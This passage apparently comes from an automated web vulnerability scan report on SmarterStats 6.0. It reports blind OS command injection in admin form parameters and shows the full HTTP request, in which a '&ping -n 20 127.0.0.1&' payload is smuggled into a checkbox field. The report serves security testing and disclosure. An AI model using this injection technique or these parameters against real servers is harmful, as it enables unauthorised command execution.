ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkO%2bUDWAPhQZDBIN%2fz%2f3gfFlozCpGuJtURlykZelxfX%2f4%3d&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:26:22 GMT
Content-Length: 0


1.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter appears to be vulnerable to OS command injection. This is a checkbox field whose only legitimate value is "on", yet the submitted value evidently reaches a Windows command shell, where the ampersand character (&) is a command separator: appending &<command>& runs an attacker-chosen command after whatever the application intended to run. Command output is not returned in the application's responses, so the injection is blind; it was verified with a time-delay command.

The payload %26ping%20-n%2020%20127.0.0.1%26 (decoded: &ping -n 20 127.0.0.1&) was submitted in the ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter. Windows ping sends one echo request per second, so this command takes roughly 19 seconds to finish. The application timed out when responding to the request, and the only response recorded is the interim HTTP 100 Continue with an empty body, indicating that the injected command caused a time delay. Because the evidence is a timeout rather than returned output, confirm the finding by comparing the response times of two requests that differ only in the -n count (for example -n 2 against -n 20) before relying on the Certain rating: a postback carrying a 30 KB __VIEWSTATE can be slow on its own.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckB
ox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%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%2F%2F%2F%2F%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%2FP%2F%2F%2F%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2Bv%2F%2F%2F%2Fz%2F%2F%2F8GBwAAAARUZXh0CgH4%2F%2F%2F%2F%2FP%2F%2F%2FwYJAAAAClJlc291cmNlSUQGCgAAAA1ATG9nTG9jYXRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU
2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAPTG9nTG9jYXRpb25zVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW01DzLcCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU
2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAALQFNlb09wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAA1TZW9PcHRpb25zVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW00DzLUCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQExvZ0ZUUAH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAACUxvZ0ZUUFRhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2F%2F%2F%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%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2
F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WGQUkY3RsMDAkTVBIJGNoa1Nlb0VuYWJsZWRfU2V0dGluZ0NoZWNrBShjdGwwMCRNUEgkY2hrU3RyaXBBZnRlclNlbWlfU2V0dGluZ0NoZWNrBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDAFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMQVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDMFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ1BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDYFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ4BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTIFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTMFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTQFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTUFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTYFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb
3gkMTcFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTgFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0xDzLWCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgU
HVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQE9wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2QFGWN0bDAwJE1QSCRQYWdlSWRlbnRpZmllcjEPBSA2NzA2YjYxZDhmYjg0MDhkYjBiZDdkYWY5OTU2ZTNlY2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW03DzLaCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQExvZ1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADExvZ1N0YXR1c1RhYgtkX5dB0MWxfpOHdZB%2BIBMIEdqpxe094wua6ZwWPljnYkU%3D&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:06:07 GMT
Content-Length: 0


1.5. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter, a setting that normally holds a small integer (5 in the captured request), appears to be vulnerable to OS command injection. It is possible to use the ampersand character (&), which cmd.exe treats as a command separator, to inject arbitrary OS commands. Command output is not returned in the application's responses, so the injection is blind; it was verified with a time-delay command.

